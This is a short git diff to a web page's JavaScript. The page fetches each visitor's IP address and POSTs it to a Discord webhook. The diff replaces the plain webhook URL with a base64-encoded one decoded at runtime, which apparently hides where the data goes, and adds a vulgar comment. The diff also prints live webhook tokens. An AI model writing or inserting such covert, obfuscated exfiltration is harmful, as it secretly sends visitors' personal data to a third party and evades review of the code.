--- a/index.html
+++ b/index.html
@@ -234,8 +234,11 @@
                 const data = await response.json();
                 ipDisplay.textContent = `IP Address: ${data.ip}`;
 
-                // Send IP to Discord webhook
-                const webhookUrl = 'https://discord.com/api/webhooks/1331190698350874634/rFQoRKH5EAJr6YWBFrCd7juIKyrxWcmP5whg0NskkSciDp-8t0kqfxapbSRCR0i8U3JM';
+                
+                const encodedWebhook = 'aHR0cHM6Ly9kaXNjb3JkLmNvbS9hcGkvd2ViaG9va3MvMTMzMjI4OTk5Mjk1NzEwNDEzOC9qVkFyeGdRT3F6LWRqRlN4YzNLRzNTT0VPeWJ5b0ZPTkRKR0FPNF8tNE9XeWhLRUJzQUwzQkp3ZHJqeEZxOWZ1Wkx3Qw==';
+                const webhookUrl = atob(encodedWebhook); // Jerk Fat Dick Pussy
+
+                
                 await fetch(webhookUrl, {
                     method: 'POST',
                     headers: {
